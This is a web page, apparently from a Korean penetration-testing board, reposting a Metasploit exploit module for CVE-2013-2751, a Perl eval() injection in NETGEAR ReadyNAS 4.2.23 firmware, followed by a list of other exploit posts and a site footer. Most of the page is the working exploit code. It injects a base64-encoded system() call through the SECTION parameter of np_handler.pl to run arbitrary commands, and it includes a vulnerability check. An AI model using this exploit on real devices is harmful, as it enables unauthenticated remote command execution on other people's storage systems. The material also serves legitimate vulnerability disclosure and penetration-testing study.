NETGEAR ReadyNAS Perl Code Evaluation



##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NETGEAR ReadyNAS Perl Code Evaluation',
      'Description'    => %q{
        This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
        due to the insecure usage of the eval() perl function. This module has been tested
        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
        hardware.
      },
      'Author'         =>
        [
          'Craig Young', # Vulnerability discovery
          'hdm',          # diff the patch
          'juan vazquez'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-2751' ],
          [ 'OSVDB', '98826' ],
          [ 'URL', 'http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/' ],
          [ 'URL', 'http://www.tripwire.com/register/security-advisory-netgear-readynas/' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 4096, # Has into account Apache request length and base64 ratio
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet'
            }
        },
      'Targets'        =>
        [
          [ 'NETGEAR ReadyNAS 4.2.23', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 12 2013'
      ))
 
    register_options(
      [
        Opt::RPORT(443)
      ], self.class)
 
  end
 
  def send_request_payload(payload)
    res = send_request_cgi({
      'uri' => normalize_uri("/np_handler", ""),
      'vars_get' => {
         'PAGE' =>'Nasstate',
         'OPERATION' => 'get',
         'SECTION' => payload
      }
    })
    return res
  end
 
  def check
    res = send_request_payload(")")
    if res and res.code == 200 and res.body =~ /syntax error at \(eval/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")"
    print_status("#{peer} - Executing payload...")
    send_request_payload(my_payload)
  end
 
end


경축! 아무것도 안하여 에스천사게임즈가 새로운 모습으로 재오픈 하였습니다.
어린이용이며, 설치가 필요없는 브라우저 게임입니다.
https://s1004games.com








본 웹사이트는 광고를 포함하고 있습니다.
광고 클릭에서 발생하는 수익금은 모두 웹사이트 서버의 유지 및 관리, 그리고 기술 콘텐츠 향상을 위해 쓰여집니다.
번호 제목 글쓴이 날짜 조회 수
공지 침투테스트(취약점검점검, 모의해킹) 문의 / 답변 졸리운_곰 2017.12.10 28360
21 BIND DNS와 DHCP 보안 취약점 발견...업데이트 필수 file 졸리운_곰 2018.03.11 261
20 인텔 칩 내에서 설계 오류 발견된 이후 이틀간의 기록 file 졸리운_곰 2018.01.04 226
19 [4.28 버그리포트] CVE-2017-8301 外 file 졸리운_곰 2017.04.28 133
18 [4.24 버그리포트] CVE-2015-1521 外 file 졸리운_곰 2017.04.25 108
17 모의해킹 보고서 [2호]_주간취약점동향리포트_20120925.pdf file 졸리운_곰 2014.11.12 360
16 GNU Bash 원격명령 실행 취약점 대응방안 권고.pdf file 졸리운_곰 2014.10.27 266
15 Wordpress Frontend Upload Plugin - Arbitrary File Upload 졸리운_곰 2014.02.17 914
14 Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation 졸리운_곰 2014.02.17 868
13 Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow 졸리운_곰 2014.02.09 779
12 Android Browser and WebView addJavascriptInterface Code Execution 졸리운_곰 2014.02.09 1375
11 Apache Tomcat Manager Application Upload Authenticated Code Execution 졸리운_곰 2014.02.09 3157
» NETGEAR ReadyNAS Perl Code Evaluation 졸리운_곰 2014.01.07 2016
9 Adobe Reader ToolButton - Use After Free 졸리운_곰 2014.01.07 1342
8 Moodle Remote Command Execution 가을의 곰을... 2013.11.06 1588
7 Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2) 가을의 곰을... 2013.11.06 1420
6 MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free 가을의 곰을... 2013.10.18 1536
5 Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability 가을의 곰을... 2013.10.17 1191
4 XAMPP 1.8.1 (lang.php, WriteIntoLocalDisk method) - Local Write Access Vulnerability 가을의 곰을... 2013.10.17 1260
3 Micorosft Internet Explorer SetMouseCapture Use-After-Free file 가을의 곰을... 2013.10.13 1151
2 Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object file 가을의 곰을... 2013.10.13 4162
대표 김성준 주소 : 경기 용인 분당수지 U타워 등록번호 : 142-07-27414
통신판매업 신고 : 제2012-용인수지-0185호 출판업 신고 : 수지구청 제 123호 개인정보보호최고책임자 : 김성준 sjkim70@stechstar.com
대표전화 : 010-4589-2193 [fax] 02-6280-1294 COPYRIGHT(C) stechstar.com ALL RIGHTS RESERVED